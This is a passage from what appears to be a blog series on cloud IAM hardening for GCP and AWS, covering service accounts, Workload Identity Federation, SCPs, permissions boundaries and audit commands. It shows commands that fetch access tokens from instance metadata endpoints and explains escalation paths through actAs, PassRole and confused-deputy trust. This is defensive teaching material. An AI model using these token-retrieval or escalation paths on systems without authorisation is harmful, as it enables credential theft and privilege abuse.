  --scopes="cloud-platform" \
  --zone=us-central1-a

From inside the VM, Application Default Credentials (ADC) handles authentication automatically:

# From the VM — ADC uses the attached SA without any credential configuration
gcloud auth application-default print-access-token

# Or via the metadata server directly
curl -H "Metadata-Flavor: Google" \
  "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"

Service Account Keys — The Antipattern to Avoid

A service account key is a JSON file containing a private key. It’s long-lived, it doesn’t expire automatically, and if it leaks it gives an attacker persistent access as that service account until someone discovers and revokes it.

# Creating a key — only if there is genuinely no alternative
gcloud iam service-accounts keys create key.json --iam-account="${SA_EMAIL}"
# This generates a long-lived credential. It will exist until explicitly deleted.

# List all active keys — do this in every audit
gcloud iam service-accounts keys list --iam-account="${SA_EMAIL}"

# Delete a key
gcloud iam service-accounts keys delete KEY_ID --iam-account="${SA_EMAIL}"

In the GCP environment I mentioned earlier — the one with roles/editor at the folder level — I also found 23 service account key files downloaded across the team’s laptops over 18 months. Nobody had a complete list of which keys were still valid and where they were stored. Several were for accounts that no longer existed. That’s not a hypothetical attack surface. It’s a breach waiting for a laptop to be stolen.

Never create service account keys when:
– Code runs on GCE/GKE/Cloud Run/Cloud Functions — use the attached service account and ADC
– Code runs in GitHub Actions — use Workload Identity Federation
– Code runs on-premises with Kubernetes — use Workload Identity Federation with OIDC

Service Account Impersonation — The Right Alternative to Keys

Instead of downloading a key, grant a user or service account permission to impersonate the service account. They generate a short-lived token, not a permanent credential:

# Allow alice to impersonate the service account
gcloud iam service-accounts add-iam-policy-binding "${SA_EMAIL}" \
  --member="user:[email protected]" \
  --role="roles/iam.serviceAccountTokenCreator"

# Alice generates a token for the SA — no key file, short-lived
gcloud auth print-access-token --impersonate-service-account="${SA_EMAIL}"

# Or configure ADC to use impersonation
export GOOGLE_IMPERSONATE_SERVICE_ACCOUNT="${SA_EMAIL}"
gcloud storage ls gs://app-assets  # runs as the SA

This is the right model for humans who need to act as service accounts for debugging or deployment: impersonate, use, done. The token expires. No file to manage.

Workload Identity Federation — Credentials Eliminated

The cleanest solution for any workload running outside GCP that needs to call GCP APIs: Workload Identity Federation. The external workload authenticates with its native identity (a GitHub Actions OIDC JWT, an AWS IAM role, a Kubernetes service account token), exchanges it for a short-lived GCP access token, and never handles a service account key.

# Create a Workload Identity Pool
gcloud iam workload-identity-pools create "github-actions-pool" \
  --project=my-project \
  --location=global \
  --display-name="GitHub Actions WIF Pool"

# Create a provider (GitHub OIDC)
gcloud iam workload-identity-pools providers create-oidc "github-provider" \
  --project=my-project \
  --location=global \
  --workload-identity-pool="github-actions-pool" \
  --issuer-uri="https://token.actions.githubusercontent.com" \
  --attribute-mapping="google.subject=assertion.sub,attribute.repository=assertion.repository" \
  --attribute-condition="assertion.repository_owner == 'my-org'"

# Allow a specific GitHub repo to impersonate the SA
gcloud iam service-accounts add-iam-policy-binding "${SA_EMAIL}" \
  --role="roles/iam.workloadIdentityUser" \
  --member="principalSet://iam.googleapis.com/projects/PROJECT_NUM/locations/global/workloadIdentityPools/github-actions-pool/attribute.repository/my-org/my-repo"

GitHub Actions workflow — no key files, no secrets stored in GitHub:

jobs:
  deploy:
    permissions:
      id-token: write   # required for OIDC token request
      contents: read
    steps:
      - uses: google-github-actions/auth@v2
        with:
          workload_identity_provider: "projects/PROJECT_NUM/locations/global/workloadIdentityPools/github-actions-pool/providers/github-provider"
          service_account: "[email protected]"

      - run: gcloud storage cp dist/ gs://app-assets/ --recursive

The OIDC JWT from GitHub is presented to GCP, which verifies it against GitHub’s public keys, checks the attribute mapping and condition (only the specified repo can use this), and issues a short-lived GCP access token. The credential exists for the duration of the job and is then gone.

IAM Deny Policies — Org-Wide Guardrails

GCP added standalone deny policies separate from bindings. They override grants:

cat > deny-iam-escalation.json << 'EOF'
{
  "displayName": "Deny IAM escalation permissions to non-admins",
  "rules": [{
    "denyRule": {
      "deniedPrincipals": ["principalSet://goog/group/[email protected]"],
      "deniedPermissions": [
        "iam.googleapis.com/roles.create",
        "iam.googleapis.com/roles.update",
        "iam.googleapis.com/serviceAccounts.actAs"
      ]
    }
  }]
}
EOF

gcloud iam policies create deny-iam-escalation-policy \
  --attachment-point="cloudresourcemanager.googleapis.com/projects/my-project" \
  --policy-file=deny-iam-escalation.json

iam.serviceAccounts.actAs is worth calling out specifically. It’s the GCP equivalent of AWS’s iam:PassRole — it allows an identity to make a service act as a specified service account. If a developer can call actAs on a high-privileged service account, they can launch a GCE instance using that service account and then operate with its permissions. Same privilege escalation pattern as iam:PassRole, different name. Deny it for anyone who doesn’t explicitly need it.

⚠ Production Gotchas

roles/editor at folder level is a blast radius waiting to happen
The role sounds like “edit access.” At folder level it means edit access to every service in every project under that folder — including services nobody thought to trace. Always scope to the specific project or resource, never a folder unless the use case explicitly requires it.

allAuthenticatedUsers on a GCS bucket is public to 3 billion accounts
Any Google account — personal Gmail included — qualifies as “authenticated.” I’ve seen production customer data exposed this way while a developer tested a CDN pattern on the wrong bucket. Audit for these bindings before they become a breach notification.

Service account keys accumulate and nobody tracks them
In every GCP environment I’ve audited that allowed SA key creation, there were active keys for accounts that no longer existed, stored on laptops with no central inventory. Keys don’t expire. Audit with gcloud iam service-accounts keys list across every SA in every project.

iam.serviceAccounts.actAs is a privilege escalation path
If a principal can call actAs on a high-privileged SA, they can launch a GCE instance with that SA and operate with its full permissions — without ever being directly granted those permissions. Block this with a deny policy for everyone who doesn’t explicitly need it.

Org-level roles/viewer is not a safe broad grant
Read access to every project config, every service configuration, every infrastructure metadata object across your entire GCP estate is not a benign grant. Treat any binding above the project level as high-blast-radius, regardless of the role.

Quick Reference

# Audit org and folder structure before any high-level change
gcloud organizations list
gcloud resource-manager folders list --organization=ORG_ID
gcloud projects list --filter="parent.id=FOLDER_ID"

# Inspect all bindings at org level
gcloud organizations get-iam-policy ORG_ID --format=json | jq '.bindings[]'

# Find allUsers / allAuthenticatedUsers in a project
gcloud projects get-iam-policy PROJECT_ID --format=json \
  | jq '.bindings[] | select(.members[] | contains("allUsers") or contains("allAuthenticatedUsers"))'

# Check a GCS bucket for public access
gsutil iam get gs://BUCKET_NAME | grep -E "(allUsers|allAuthenticatedUsers)"

# Audit all user-managed SA keys across a project
gcloud iam service-accounts list --project=PROJECT_ID --format="value(email)" \
  | xargs -I{} gcloud iam service-accounts keys list --iam-account={} --managed-by=user

# List predefined roles for a service
gcloud iam roles list --filter="name:roles/storage" --format="table(name,title)"

# Inspect what permissions a role actually includes
gcloud iam roles describe roles/storage.objectViewer

# Grant time-limited access with conditional binding
gcloud projects add-iam-policy-binding PROJECT_ID \
  --member="user:[email protected]" \
  --role="roles/storage.objectViewer" \
  --condition="expression=request.time < timestamp('2026-06-30T00:00:00Z'),title=Contractor Q2 2026"

# Enable SA impersonation (avoids key creation)
gcloud iam service-accounts add-iam-policy-binding SA_EMAIL \
  --member="user:[email protected]" \
  --role="roles/iam.serviceAccountTokenCreator"

Framework Alignment

Framework	Reference	What It Covers Here
CISSP	Domain 5 — Identity and Access Management	GCP’s hierarchical model and service account patterns are the primary IAM constructs for GCP environments
CISSP	Domain 3 — Security Architecture	Resource hierarchy design determines access inheritance — architectural decisions with direct security implications
ISO 27001:2022	5.15 Access control	GCP IAM bindings are the technical implementation of access control policy in GCP environments
ISO 27001:2022	5.18 Access rights	Service account provisioning, conditional bindings with expiry, and workload identity federation
ISO 27001:2022	8.2 Privileged access rights	Folder/org-level bindings and basic roles represent the highest-risk privilege grants in GCP
SOC 2	CC6.1	IAM bindings and Workload Identity Federation address machine identity controls for CC6.1
SOC 2	CC6.3	Conditional bindings with time-bound expiry directly satisfy access removal requirements

Key Takeaways

GCP IAM is hierarchical — bindings inherit downward; a binding at org or folder level has much larger scope than it appears
Basic roles (viewer/editor/owner) are too coarse for production; use predefined or custom roles and grant at the narrowest scope
Service account keys are a long-lived credential antipattern; use ADC on GCP infrastructure, impersonation for humans, and Workload Identity Federation for external workloads
allAuthenticatedUsers and allUsers bindings expose resources to the internet — audit for these in every environment
iam.serviceAccounts.actAs is a privilege escalation vector — treat it like iam:PassRole
Conditional bindings with expiry dates are better than “I’ll remember to remove this later”

What’s Next

EP06 covers Azure RBAC and Entra ID — the most directory-centric of the three models, where Active Directory’s 25 years of enterprise history shapes both the strengths and the complexity of Azure’s access control.

Next: Azure RBAC Scopes — Management Groups, Subscriptions, and how role inheritance works across the Microsoft estate.

Get EP06 in your inbox when it publishes → subscribe

AWS IAM Deep Dive: Users, Groups, Roles, and Policies Explained

May 10, 2026April 14, 2026 by Vamshi Krishna Santhapuri

Reading Time: 11 minutes

What Is Cloud IAM → Authentication vs Authorization → IAM Roles vs Policies → AWS IAM Deep Dive → GCP Resource Hierarchy IAM

TL;DR

IAM users with long-lived access keys are legacy — use IAM Identity Center with federation; static keys are a security finding, not a feature
Roles issue temporary credentials via STS — the right identity model for every service (Lambda, EC2, ECS, CI/CD)
Every role has two required configs: trust policy (who can assume it) + permission policy (what it can do) — both must be correct
SCPs set the org-level ceiling; they cannot grant permissions and do not apply to the management account
Permissions boundaries set an identity-level ceiling — effective permissions are the intersection with identity-based policies, not the union
Cross-account trust without an ExternalId condition is vulnerable to the confused deputy attack — always include it with third-party trust
One role per service, never shared — a shared role’s blast radius is the union of what every consumer needs

The Big Picture

AWS IAM evaluates every API call through a specific chain. Understanding this chain is how you debug access issues and how you design guardrails that actually hold.

  AWS POLICY EVALUATION — every API call walks this chain top to bottom
  An explicit DENY at any step ends evaluation immediately.

         API call arrives
               │
               ▼
  ┌────────────────────────────┐
  │  Explicit DENY in any SCP? │── YES ──────────────────────────► DENIED
  └────────────────┬───────────┘     (cannot be overridden by anything)
                   │ NO
                   ▼
  ┌────────────────────────────┐
  │  SCP present with no ALLOW │── YES ──────────────────────────► DENIED
  └────────────────┬───────────┘
                   │ NO (or no SCP / management account)
                   ▼
  ┌────────────────────────────┐
  │  Explicit DENY in any      │── YES ──────────────────────────► DENIED
  │  identity or resource      │
  │  policy?                   │
  └────────────────┬───────────┘
                   │ NO
                   ▼
  ┌────────────────────────────┐
  │  Resource-based policy     │── YES (same-account principal) ──► ALLOWED*
  │  with ALLOW?               │
  └────────────────┬───────────┘   *unless denied above
                   │ NO
                   ▼
  ┌────────────────────────────┐
  │  Permissions boundary      │── YES, boundary has NO ALLOW ───► DENIED
  │  attached?                 │
  └────────────────┬───────────┘
                   │ NO boundary, or boundary ALLOWS
                   ▼
  ┌────────────────────────────┐
  │  Session policy attached   │── YES, session has NO ALLOW ────► DENIED
  │  (role assumption)?        │
  └────────────────┬───────────┘
                   │ NO session policy, or session ALLOWS
                   ▼
  ┌────────────────────────────┐
  │  Identity-based policy     │── YES ──────────────────────────► ALLOWED
  │  with ALLOW?               │
  └────────────────┬───────────┘
                   │ NO
                   ▼
                DENIED (default — nothing explicitly granted)

  Debugging AccessDenied: work bottom-up.
  Start with the identity-based policy. Then boundary. Then SCP.

Introduction

An AWS IAM deep dive reveals what most teams miss: the difference between an IAM model that works under deadline and one that survives scale, audits, and staff turnover. If you’ve read IAM roles vs policies and understand the three-layer stack, this is where it becomes specific to AWS — trust policies, SCPs, permissions boundaries, cross-account trust, and Identity Center.

In 2017 I was asked to help clean up an AWS account that had been running in production for two years. The team had built something real — a microservices application, a data pipeline, a CI/CD system. Competent engineers. But nobody had been specifically accountable for IAM.

When I pulled the configuration:

One IAM user with AdministratorAccess shared by the entire dev team. Password in a shared password manager. Access key three years old.
Six Lambda functions each carrying AWSLambdaFullAccess, AmazonS3FullAccess, and AmazonDynamoDBFullAccess — three broad managed policies each, instead of one custom policy with what each function actually needed.
A CI/CD pipeline role with iam:* on * because someone once needed to create a role during a deployment and found that the easiest path.
Three IAM users for contractors who had finished their engagements months earlier. Still active, access keys still valid.

None of this was malicious. All of it was the result of reaching for the broadest thing that works, under deadline, without a framework for IAM decisions.

AWS IAM is the most flexible cloud IAM system. That flexibility is the problem. If you don’t know the full model, you default to broad grants because they’re easier to reason about. Broad things accumulate into exposure. This episode is the full model.

AWS IAM Identity Types: Users, Groups, and Roles Compared

IAM Users: Why Static Access Keys Are a Security Finding

An IAM user is a permanent identity with long-lived credentials: a password for console access, and optionally an access key pair. No expiry on the access key by default.

# Create a user
aws iam create-user --user-name alice

# Generate an access key — no expiry unless you set one
aws iam create-access-key --user-name alice

# Enforce MFA for console access
aws iam create-virtual-mfa-device \
  --virtual-mfa-device-name alice-mfa \
  --outfile /tmp/alice-mfa.png \
  --bootstrap-method QRCodePNG

aws iam enable-mfa-device \
  --user-name alice \
  --serial-number arn:aws:iam::123456789012:mfa/alice-mfa \
  --authentication-code1 123456 \
  --authentication-code2 654321

The access key exists the moment you create it. It survives team changes, org restructures, and offboarding unless someone explicitly deletes it. In practice, access keys are where I find the oldest, most-forgotten credentials in every AWS account I’ve audited.

Current best practice: don’t create IAM users for human access. Use IAM Identity Center with federation. Static access keys are a finding, not a feature.

IAM groups — useful but limited

Groups are collections of users. Policies attached to a group apply to all members. Useful as a middle layer, but limited: you can’t add roles or services to a group, and if you’re moving toward Identity Center, groups in IAM become less relevant.

aws iam create-group --group-name Backend-Developers
aws iam attach-group-policy \
  --group-name Backend-Developers \
  --policy-arn arn:aws:iam::aws:policy/AmazonS3ReadOnlyAccess
aws iam add-user-to-group --group-name Backend-Developers --user-name alice

IAM Roles: How STS Temporary Credentials Work

A role is an identity without permanent credentials. It is assumed by entities — services, users, external systems — and STS issues temporary credentials. Those credentials expire. Nothing to rotate.

# Create a role that EC2 can assume
cat > ec2-trust-policy.json << 'EOF'
{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Principal": { "Service": "ec2.amazonaws.com" },
    "Action": "sts:AssumeRole"
  }]
}
EOF

aws iam create-role \
  --role-name AppServerRole \
  --assume-role-policy-document file://ec2-trust-policy.json

aws iam attach-role-policy \
  --role-name AppServerRole \
  --policy-arn arn:aws:iam::aws:policy/AmazonS3ReadOnlyAccess

# EC2 needs an instance profile to carry the role
aws iam create-instance-profile --instance-profile-name AppServerProfile
aws iam add-role-to-instance-profile \
  --instance-profile-name AppServerProfile \
  --role-name AppServerRole

# Launch with the profile
aws ec2 run-instances \
  --image-id ami-0abcdef1234567890 \
  --instance-type t3.micro \
  --iam-instance-profile Name=AppServerProfile

From inside the instance — no credential files, no configuration:

curl http://169.254.169.254/latest/meta-data/iam/security-credentials/AppServerRole
# Returns: AccessKeyId, SecretAccessKey, Token, Expiration
# AWS refreshes these before they expire. The application never sees a rotation event.

Lambda, ECS, and other services use different attachment mechanisms but the same model.

AWS IAM Policy Types: Managed, Inline, SCP, and Boundaries

Managed vs inline policies

┌────────────────────┬──────────────────────────────────┬──────────────────────────────────────┐
│ Type               │ Description                      │ Use when                             │
├────────────────────┼──────────────────────────────────┼──────────────────────────────────────┤
│ AWS Managed        │ Created by AWS, read-only        │ Quick prototyping; never production  │
│ Customer Managed   │ Created by you, reusable         │ Standard production permissions      │
│ Inline             │ Embedded in user/group/role      │ Explicit 1:1 non-transferable binding│
└────────────────────┴──────────────────────────────────┴──────────────────────────────────────┘

AWS Managed policies like AmazonS3FullAccess are convenient and dangerous for the same reason: broad by design, meant to cover every use case. For a Lambda that reads one specific bucket, AmazonS3FullAccess grants approximately 30 permissions you didn’t need.

# Create a customer managed policy — scoped to what the Lambda actually does
cat > lambda-reader-policy.json << 'EOF'
{
  "Version": "2012-10-17",
  "Statement": [{
    "Sid": "ReadSpecificBucket",
    "Effect": "Allow",
    "Action": ["s3:GetObject", "s3:ListBucket"],
    "Resource": [
      "arn:aws:s3:::app-data-prod",
      "arn:aws:s3:::app-data-prod/*"
    ]
  }]
}
EOF

aws iam create-policy \
  --policy-name LambdaS3ReadPolicy \
  --policy-document file://lambda-reader-policy.json

aws iam attach-role-policy \
  --role-name lambda-image-processor-role \
  --policy-arn arn:aws:iam::123456789012:policy/LambdaS3ReadPolicy

Service Control Policies — org-wide guardrails

SCPs attach to AWS Organization OUs or accounts. They define the maximum permissions any identity in that scope can have. They cannot grant — only restrict.

Two SCPs I apply to every account from day one:

// Region restriction — blast radius control
{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Deny",
    "Action": "*",
    "Resource": "*",
    "Condition": {
      "StringNotEquals": {
        "aws:RequestedRegion": ["ap-south-1", "us-east-1", "eu-west-1"]
      }
    }
  }]
}

// Protect the audit trail — anti-forensics control
{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Deny",
    "Action": [
      "cloudtrail:StopLogging",
      "cloudtrail:DeleteTrail",
      "cloudtrail:UpdateTrail"
    ],
    "Resource": "*"
  }]
}

The region restriction limits where compromised credentials can operate. The CloudTrail restriction means even an AdministratorAccess compromise cannot erase the audit trail. The attacker knows they’re being logged and cannot stop it. This is the authorization layer — understanding authentication vs authorization makes clear why SCPs operate at Gate 2, not Gate 1.

Permissions boundaries — identity-level ceilings

A permissions boundary sets the maximum permissions for a specific user or role. Effective permissions are the intersection of what the boundary allows and what identity-based policies grant.

Boundary allows:  s3:*, dynamodb:*
Identity policy:  s3:*, ec2:*
──────────────────────────────────
Effective:        s3:*             ← the intersection only

// Boundary: this role can use at most S3 and DynamoDB
{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Action": ["s3:*", "dynamodb:*"],
    "Resource": "*"
  }]
}

aws iam put-role-permissions-boundary \
  --role-name DevTeamRole \
  --permissions-boundary arn:aws:iam::123456789012:policy/DevTeamBoundary

I use permissions boundaries for safe IAM delegation. When a dev team needs to create their own roles for their services, I give them iam:CreateRole and iam:AttachRolePolicy — but require any role they create to have a specific boundary. They can self-service IAM without accidentally creating a role more powerful than their team should have.

How AWS Cross-Account IAM Trust Works

AWS accounts are IAM isolation boundaries. An identity in Account A has zero access to Account B by default. Cross-account access requires explicit trust in both directions.

Account B creates a role with a trust policy naming Account A's identity.
Account A's identity has permission to call sts:AssumeRole on that role.

// Account B: trust policy on the cross-account role
{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Principal": {
      "AWS": "arn:aws:iam::ACCOUNT_A_ID:role/DeployPipelineRole"
    },
    "Action": "sts:AssumeRole",
    "Condition": {
      "StringEquals": { "sts:ExternalId": "unique-external-id-12345" }
    }
  }]
}

# Account A: the pipeline assumes the cross-account role
aws sts assume-role \
  --role-arn arn:aws:iam::ACCOUNT_B_ID:role/DeployTarget \
  --role-session-name pipeline-deploy \
  --external-id unique-external-id-12345

# Export the temporary credentials and operate in Account B
export AWS_ACCESS_KEY_ID=...
export AWS_SECRET_ACCESS_KEY=...
export AWS_SESSION_TOKEN=...
aws s3 ls s3://account-b-bucket/

The ExternalId condition prevents the confused deputy attack. Without it, if you operate a service that assumes roles on behalf of customers, an attacker who knows your service’s ARN can trick it into assuming their customer’s role.

The ExternalId is a shared secret proving the party requesting assumption is the one who established the trust. Always include it for third-party cross-account trust.

AWS IAM Identity Center: Federated Human Access Without Static Keys

IAM Identity Center (formerly AWS SSO) is the modern answer to “how do engineers access AWS accounts?” It federates an external IdP and maps your organization’s groups to Permission Sets.

  Okta / Google Workspace / Entra ID
    ↓ SAML 2.0 or OIDC
  IAM Identity Center
    ↓ Permission Sets (collections of policies)
  Account Assignments (group → permission set → account)
    ↓
  Temporary credentials in each target account (no long-lived keys)

# Configure CLI access via Identity Center
aws configure sso
# Prompts: SSO start URL, region, account, role

# Login — browser opens for IdP auth
aws sso login --profile prod-admin

# Use normally — credentials are temporary and auto-refreshed
aws s3 ls --profile prod-admin
aws ec2 describe-instances --profile prod-admin

When someone leaves the organization: disable them in your IdP. Their SSO session expires, their temporary credentials expire, access is gone. That’s it — no access key hunting across 20 accounts.

AWS IAM Patterns for Production: What Survives Scale

Every Lambda, ECS task, and EC2 application gets its own role. Even two Lambdas doing similar things. The moment you share a role, its permissions are the union of what each consumer needs — and a compromise of one consumer exposes the full union.

# Dedicated execution role — specific to this function's actual needs
aws iam create-role \
  --role-name lambda-invoice-processor-role \
  --assume-role-policy-document \
  '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"Service":"lambda.amazonaws.com"},"Action":"sts:AssumeRole"}]}'

aws iam put-role-policy \
  --role-name lambda-invoice-processor-role \
  --policy-name InvoiceProcessorPolicy \
  --policy-document file://lambda-invoice-processor-policy.json

IAM escalation guardrail

Any role that isn’t an explicit IAM admin should have a guardrail blocking escalation actions:

{
  "Sid": "DenyIAMEscalation",
  "Effect": "Deny",
  "Action": [
    "iam:CreateUser", "iam:CreateRole", "iam:AttachRolePolicy",
    "iam:PutRolePolicy", "iam:PassRole", "iam:CreateAccessKey"
  ],
  "Resource": "*",
  "Condition": {
    "StringNotEquals": {
      "aws:PrincipalArn": "arn:aws:iam::123456789012:role/InfraAdminRole"
    }
  }
}

Even if a role gets over-permissioned, it cannot create users, escalate its own privileges, or pass roles to expand its access. Defense in depth against the privilege escalation paths covered in AWS IAM Privilege Escalation: How iam:PassRole Leads to Full Compromise.

Least privilege with tag conditions

{
  "Effect": "Allow",
  "Action": ["ec2:StartInstances", "ec2:StopInstances", "ec2:RebootInstances"],
  "Resource": "arn:aws:ec2:*:*:instance/*",
  "Condition": {
    "StringEquals": {
      "aws:ResourceTag/Environment": "dev",
      "aws:ResourceTag/Owner": "${aws:username}"
    }
  }
}

A developer can control EC2 instances in dev — specifically the ones tagged as theirs. Not prod. Not someone else’s instances. ABAC layered on a role, eliminating a class of privilege escalation through direct resource access.

⚠ Production Gotchas

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 1 — SCPs don't apply to the management account          ║
║                                                                      ║
║  SCPs are applied to member accounts and OUs — not to the org      ║
║  management account. Guardrails you apply to member accounts do    ║
║  not protect the management account itself.                         ║
║                                                                      ║
║  Fix: lock down the management account separately. Use it only for  ║
║  billing and org management. Never run workloads in it.             ║
╚══════════════════════════════════════════════════════════════════════╝

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 2 — Permissions boundary ≠ policy grant                 ║
║                                                                      ║
║  A boundary that allows s3:* does NOT grant S3 access. The         ║
║  boundary is a ceiling. Effective permissions are the intersection  ║
║  of boundary + identity policy. Both must explicitly Allow.         ║
║                                                                      ║
║  Fix: after setting a boundary, check effective permissions with:   ║
║  aws iam simulate-principal-policy                                  ║
╚══════════════════════════════════════════════════════════════════════╝

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 3 — Cross-account trust without ExternalId              ║
║                                                                      ║
║  A trust policy that names any principal from Account A without     ║
║  ExternalId can be exploited if you operate a multi-tenant service. ║
║  An attacker can craft a request that tricks your service into      ║
║  assuming a victim's role (confused deputy).                        ║
║                                                                      ║
║  Fix: always add ExternalId condition to third-party trust policies.║
╚══════════════════════════════════════════════════════════════════════╝

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 4 — iam:* on * in CI/CD role                           ║
║                                                                      ║
║  "The pipeline needs to create roles" is a legitimate requirement.  ║
║  Granting iam:* on * is not. It lets the pipeline create any role  ║
║  with any permissions — effectively full account access.            ║
║                                                                      ║
║  Fix: grant specific iam: actions, require all created roles to     ║
║  carry a permissions boundary. Delegate without escalating.         ║
╚══════════════════════════════════════════════════════════════════════╝

Quick Reference

┌───────────────────────────┬───────────────────────────────────────────────────────────┐
│ Term                      │ What it is                                                │
├───────────────────────────┼───────────────────────────────────────────────────────────┤
│ IAM User                  │ Permanent identity with long-lived credentials — legacy   │
│ IAM Role                  │ Assumable identity; STS issues temp creds — preferred     │
│ Trust policy              │ Who can assume this role (separate from permissions)      │
│ Instance profile          │ Container that attaches a role to an EC2 instance        │
│ AWS Managed policy        │ Broad, maintained by AWS — avoid in production           │
│ Customer Managed policy   │ You own it, you scope it — correct default               │
│ Inline policy             │ 1:1 binding, non-reusable — use only when intentional    │
│ SCP                       │ Org-level guardrail; constrains, does not grant          │
│ Permissions boundary      │ Identity-level ceiling; intersection with policy = effective│
│ Session policy            │ Restricts a specific role assumption session             │
│ ExternalId                │ Shared secret in cross-account trust — prevents confused deputy│
│ IAM Identity Center       │ Federated human access via SSO; no long-lived keys       │
│ Permission Set            │ Policy collection in Identity Center → becomes role in account│
└───────────────────────────┴───────────────────────────────────────────────────────────┘

Commands to know:
┌────────────────────────────────────────────────────────────────────────────────────────┐
│  # Simulate a policy before deploying — will this call succeed?                      │
│  aws iam simulate-principal-policy \                                                  │
│    --policy-source-arn arn:aws:iam::ACCOUNT:role/MyRole \                            │
│    --action-names s3:GetObject \                                                      │
│    --resource-arns arn:aws:s3:::my-bucket/*                                          │
│                                                                                        │
│  # Full IAM snapshot of the account — all users, roles, policies, groups            │
│  aws iam get-account-authorization-details --output json > iam-snapshot.json         │
│                                                                                        │
│  # Find unused permissions — what does this role actually call?                      │
│  aws iam generate-service-last-accessed-details \                                     │
│    --arn arn:aws:iam::ACCOUNT:role/MyRole                                            │
│  aws iam get-service-last-accessed-details --job-id JOB_ID                           │
│                                                                                        │
│  # List all access keys and their age                                                │
│  aws iam list-users --query 'Users[].UserName' --output text | \                    │
│    xargs -I{} aws iam list-access-keys --user-name {}                               │
│                                                                                        │
│  # Check effective permissions boundary on a role                                    │
│  aws iam get-role --role-name MyRole \                                               │
│    --query 'Role.PermissionsBoundary'                                                │
│                                                                                        │
│  # Assume a cross-account role                                                       │
│  aws sts assume-role \                                                                │
│    --role-arn arn:aws:iam::TARGET_ACCOUNT:role/CrossAccountRole \                   │
│    --role-session-name deploy-session \                                               │
│    --external-id your-external-id                                                    │
└────────────────────────────────────────────────────────────────────────────────────────┘

Framework Alignment

Framework	Reference	What It Covers Here
CISSP	Domain 5 — Identity and Access Management	AWS IAM is the most widely deployed cloud IAM system; this covers the full model
CISSP	Domain 6 — Security Assessment and Testing	Policy evaluation logic is the foundation for cloud security assessments
ISO 27001:2022	5.15 Access control	Access control policy in AWS — SCPs, identity-based policies, resource-based policies
ISO 27001:2022	5.18 Access rights	User and role provisioning, permission boundaries, Identity Center assignments
ISO 27001:2022	8.2 Privileged access rights	IAM Identity Center, SCPs as org-level guardrails, least-privilege role design
SOC 2	CC6.1	AWS IAM is the primary technical control for CC6.1 in AWS-hosted environments
SOC 2	CC6.3	Identity Center with federation enables auditable access provisioning and removal
SOC 2	CC6.6	Cross-account trust relationships and ExternalId address third-party access controls

Key Takeaways

IAM users with static access keys are legacy for human access — use IAM Identity Center with federation; static keys are a persistent finding
Roles issue temporary credentials and are the right identity for every service — Lambda, EC2, ECS, CI/CD, cross-account
Trust policy controls who can assume a role; permission policy controls what the role can do — debug both when access fails
SCPs cap maximum permissions at org level and cannot be overridden — use them for region restriction and audit trail protection; they do not apply to the management account
Permissions boundaries cap at identity level — effective permissions are the intersection with identity-based policies, not the union
Cross-account trust without ExternalId is vulnerable to confused deputy — always include it with third-party trust
One role per service; share nothing — a shared role’s blast radius is the union of every consumer’s required permissions

What’s Next

EP05 moves to GCP IAM — a fundamentally different model where the resource hierarchy drives access inheritance. A misconfiguration at the folder level affects every project below it. We’ll cover why roles/editor keeps appearing in production audits and how to build a GCP IAM structure that composes correctly up the hierarchy.

Get the GCP IAM deep dive in your inbox when it publishes → https://linuxcent.com/subscribe

Next: GCP IAM Policy Inheritance: How the Resource Hierarchy Controls Access

IAM Roles vs Policies: How Cloud Authorization Actually Works

May 10, 2026April 14, 2026 by Vamshi Krishna Santhapuri

Reading Time: 12 minutes

What Is Cloud IAM → Authentication vs Authorization → IAM Roles vs Policies → AWS IAM Deep Dive → GCP Resource Hierarchy IAM → Azure RBAC Scopes

TL;DR

Every cloud permission is atomic: one action (s3:GetObject) on one resource class — the indivisible unit of access
Policies group permissions into documents with conditions; roles carry policies and are assigned to identities
Never attach policies directly to users — roles are the indirection layer that makes access auditable and revocable
AWS roles have two required configs: trust policy (who can assume) + permission policy (what they can do) — both must be right
GCP binds roles to resources; AWS attaches policies to identities — the mental models run in opposite directions
iam:PassRole in AWS and iam.serviceAccounts.actAs in GCP are privilege escalation vectors — always scope to specific ARNs, never *

The Big Picture

Three primitives underlie every cloud IAM system. Learn how they connect and any cloud access model becomes readable.

  THE THREE-LAYER STACK
  Build bottom-up. Assign top-down. Change one layer without touching the others.

  ┌──────────────────────────────────────────────────────────────────────┐
  │  LAYER 3 — IDENTITY                                                  │
  │  [email protected]  ·  backend-service  ·  ci-runner@proj           │
  │  "who is acting — a human, a service, or a machine"                 │
  ├──────────────────────────────────────────────────────────────────────┤
  │  LAYER 2 — ROLE                                                      │
  │  BackendDeveloper  ·  DataAnalyst  ·  DeployBot  ·  S3ReadOnly      │
  │  "what function does this identity serve — the job title"           │
  ├──────────────────────────────────────────────────────────────────────┤
  │  LAYER 1 — POLICY                                                    │
  │  AllowS3Read  ·  AllowECRPush  ·  DenyProdDelete  ·  RequireMFA    │
  │  "what is explicitly permitted or denied, under what conditions"    │
  ├──────────────────────────────────────────────────────────────────────┤
  │  LAYER 0 — PERMISSION                                                │
  │  s3:GetObject  ·  ecr:PutImage  ·  s3:DeleteObject  ·  iam:PassRole│
  │  "one verb on one class of resource — the atom of access control"  │
  └──────────────────────────────────────────────────────────────────────┘

  When alice joins the backend team → assign her the BackendDeveloper role
  When the S3 bucket changes → update the policy once; alice gets it automatically
  When alice leaves → remove the role assignment; policy and permissions are untouched

If this maps better to something physical:

  PHYSICAL WORLD            →    CLOUD IAM

  A specific door rule           Permission      s3:GetObject
  Keycard access profile    →    Policy          AllowS3Read
  Job title                 →    Role            BackendDeveloper
  The employee              →    Identity        [email protected]

  When the employee leaves: revoke the role assignment.
  The job title, the keycard profile, the door rules — all unchanged.
  Next hire gets the same role. Same access. No manual work.

Introduction

IAM roles vs policies is a distinction that defines how cloud authorization actually works — and getting it wrong is how access sprawl starts. Every authentication vs authorization failure at the authorization layer traces back to how these three primitives are — or aren’t — structured.

